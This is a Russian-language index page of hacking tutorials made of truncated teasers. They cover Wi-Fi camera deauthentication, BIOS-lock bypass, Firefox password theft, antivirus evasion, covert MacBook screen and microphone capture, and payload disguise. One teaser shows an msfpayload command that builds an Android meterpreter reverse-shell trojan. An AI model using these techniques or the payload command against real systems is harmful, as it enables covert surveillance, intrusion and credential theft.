Домой Обучение (страницы 11)

Обучение


Отключение камер безопасности в любой Wi-Fi сети с помощью Aireplay-Ng

Тактики электронного противостояния основаны на блокировании, прерывании или отключении объектов от той технологии, на основе которой они работают. И объекты IoT («Интернет Вещей») особенно уязвимы к такого рода атакам. Беспроводные камеры безопасности, такие как Nest Cam, часто используются для обеспечения мер безопасности в различных местах. Хакер может просто отключить такую веб-камеру или другое устройство от Wi-Fi сети, тем самым выведя …

Как обойти блокировку Windows, чтобы запустить Kali Linux c Live USB

Запустить Kali Linux с Live USB легко на любом доступном компьютере, но многие публичные ноутбуки и настольные компьютеры блокируются для предотвращения такого использования. Школьные, рабочие или библиотечные ПК могут быть защищены паролем BIOS, который достаточно часто можно сбросить до пароля по умолчанию. Как только вы получите доступ к такому компьютеру, вы сможете использовать USB-диск или флешку для запуска Kali на …


Charles Proxy — как увидеть исходящие и входящие данные мобильных приложений

Если вы используете мобильное устройство, то ставим 100 баксов, что ваши приложения пересылают довольно много разной информации на их сервера и обратно. Чтобы убедиться в отсутствии ненадлежащего сбора данных, стоит настроить веб-прокси для отслеживания всего трафика, чтобы совершенно точно знать, какие приложения «звонят домой» и когда. С установленным прокси-сервером вы сможете анализировать все, что отправляют и принимают приложения для Android …

Как удаленно сохранять пароли из браузера Firefox

Пароли и данные, хранящиеся в веб-браузерах, чрезвычайно важны для хакеров. Для денежной выгоды или как способ развлечения «черношляпных» хакеров. Не думайте, что лично вы не представляете для них интереса. И хотя мы определенно не «черные шляпы», обнаружение интересных способов выполнения пост-эксплуатации забэкдоренного MacBook было интересным опытом. До сих пор удивляемся тому, как легко злоупотреблять теми инструментами, которые встроены в macOS, …

Как за 5 секунд обойти антивирусы с помощью одной Python-команды

Мнение о том, что macOS более безопасная операционная система, чем Windows, далеко от истины. С помощью одной небольшой команды хакер может получить контроль над MacBook’ом и управлять им удаленно. Огромное количество компьютеров Windows, работающих в настоящее время по всему миру, — это очень лакомый кусочек для хакеров, разработчиков вирусов и баунтихантеров («охотников за багами»), которые хотят заработать на обнаружении в …

Как проникнуть в MacBook, зашифрованный с помощью FileVault

Не думайте, что если ваш MacBook использует шифрование диска FileVault,, то ваше устройство защищено от хакерских атак. Сегодня вы выясните, достаточно ли у вас сильный пароль для FileVault и сможет ли он противостоять атаке целеустремленного хакера. FileVault, созданный Apple в 2003 году, представляет собой функцию шифрования жесткого диска, встроенную в операционные системы Mac. Шифрование помогает защититься от атак с физическим доступом …

Как удаленно записывать данные с экрана чужого MacBook’а

Стримить видео с экрана чужого MacBook’а можно без использования приложений для шаринга экранов и без открытия каких-либо портов на целевом устройстве. Хакер с низким уровнем пользовательских прав может в режиме реального времени видеть на забэкдоренном Mac’е каждое действие своей жертвы независимо от того, где они находятся. Мы продолжаем серию статей по взломам macOS. Сегодня мы покажем, как скрытно делать видеозапись …

Как удаленно прослушивать микрофон на чьем-нибудь Macbook’е

Google, Amazon и Facebook всегда слушают. Что может быть хуже? Хакеры, кстати, тоже слушают. Особенно уязвимы ПК с Windows. С помощью нескольких простых команд хакер может удаленно захватить микрофон на чем-то Mac’е, а затем, используя потоковое аудио в режиме реального времени прослушивать частные разговоры без ведома жертвы, злоупотребляя халатным отношением к вопросам безопасности. После того, как хакер установит бэкдор на уязвимом MacBook …

Как удаленно взломать Android с помощью Kali

Привет, хакеры! Добро пожаловать на наш сайт. В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете. Шаг 1. Запустите Кали Откройте терминал, и создайте файл Trojan.apk Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > …

Как сделать неуловимую полезную нагрузку. Часть 2. Скрытие полезной нагрузки

После того, как хакер создал PowerShell-полезную нагрузку, чтобы обойти антивирусное программное обеспечение, и настроил msfconsole на своей машине, он может перейти к следующему шагу — маскировке своего исполняемого файла, чтобы он выглядел как обычный текстовый. Вот так он и вынуждает ничего не подозревающих пользователей Windows 10 открывать полезную нагрузку. Полезная нагрузка для PowerShell, генерируемая Unicorn, работает на целевой машине Windows …

Страница 11 из 17Первый...910111213 ...Последние
Подпишись на обновления!

Реклама